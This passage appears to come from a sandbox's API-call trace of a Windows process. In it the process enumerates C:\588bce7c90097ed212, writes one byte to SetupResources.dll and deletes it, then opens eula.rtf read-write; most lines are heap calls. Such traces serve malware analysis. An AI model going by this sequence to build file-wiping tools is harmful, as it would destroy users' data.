hHeap=0x20000) returned 1 [0072.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0072.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0072.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0072.666] CloseHandle (hObject=0x418) returned 1 [0072.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.667] CloseHandle (hObject=0x410) returned 1 [0072.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0072.667] AreFileApisANSI () returned 1 [0072.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0072.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0072.667] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.668] GetFileType (hFile=0x410) returned 0x1 [0072.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.668] GetLastError () returned 0xb7 [0072.668] SetLastError (dwErrCode=0xb7) [0072.668] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0072.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.669] CloseHandle (hObject=0x410) returned 1 [0072.670] AreFileApisANSI () returned 1 [0072.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0072.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 46 [0072.670] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0072.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.671] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f6, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧荐\x07̧비聐蚀\x08賂̧")) returned 0 [0072.671] FindClose (in: hFindFile=0x78350 | out: hFindFile=0x78350) returned 1 [0072.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0072.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0072.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0072.672] AreFileApisANSI () returned 1 [0072.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3082", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3082", lpUsedDefaultChar=0x0) returned 27 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.673] AreFileApisANSI () returned 1 [0072.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0072.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78110 [0072.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78110, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082") returned 27 [0072.673] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082" (normalized: "c:\\588bce7c90097ed212\\3082"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.673] GetLastError () returned 0x5 [0072.673] GetLastError () returned 0x5 [0072.673] SetLastError (dwErrCode=0x5) [0072.673] GetLastError () returned 0x5 [0072.673] SetLastError (dwErrCode=0x5) [0072.673] GetLastError () returned 0x5 [0072.673] SetLastError (dwErrCode=0x5) [0072.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78110 | out: hHeap=0x20000) returned 1 [0072.673] AreFileApisANSI () returned 1 [0072.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0072.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78450 [0072.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78450, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082") returned 27 [0072.673] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082" (normalized: "c:\\588bce7c90097ed212\\3082"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.673] GetLastError () returned 0x5 [0072.673] GetLastError () returned 0x5 [0072.673] SetLastError (dwErrCode=0x5) [0072.673] GetLastError () returned 0x5 [0072.673] SetLastError (dwErrCode=0x5) [0072.673] GetLastError () returned 0x5 [0072.674] SetLastError (dwErrCode=0x5) [0072.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78450 | out: hHeap=0x20000) returned 1 [0072.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.674] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Client", cAlternateFileName="")) returned 1 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0072.674] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78090 [0072.674] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.674] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0072.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0072.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.675] AreFileApisANSI () returned 1 [0072.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3082\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0072.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0072.676] AreFileApisANSI () returned 1 [0072.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0072.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0072.676] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.676] GetFileType (hFile=0x410) returned 0x1 [0072.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.676] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0072.676] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0072.676] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0072.677] CloseHandle (hObject=0x410) returned 1 [0072.677] AreFileApisANSI () returned 1 [0072.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69440 [0072.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x69440, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0072.677] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.677] GetFileType (hFile=0x410) returned 0x1 [0072.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69440 | out: hHeap=0x20000) returned 1 [0072.677] CloseHandle (hObject=0x410) returned 1 [0072.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0072.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0072.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0072.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0072.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 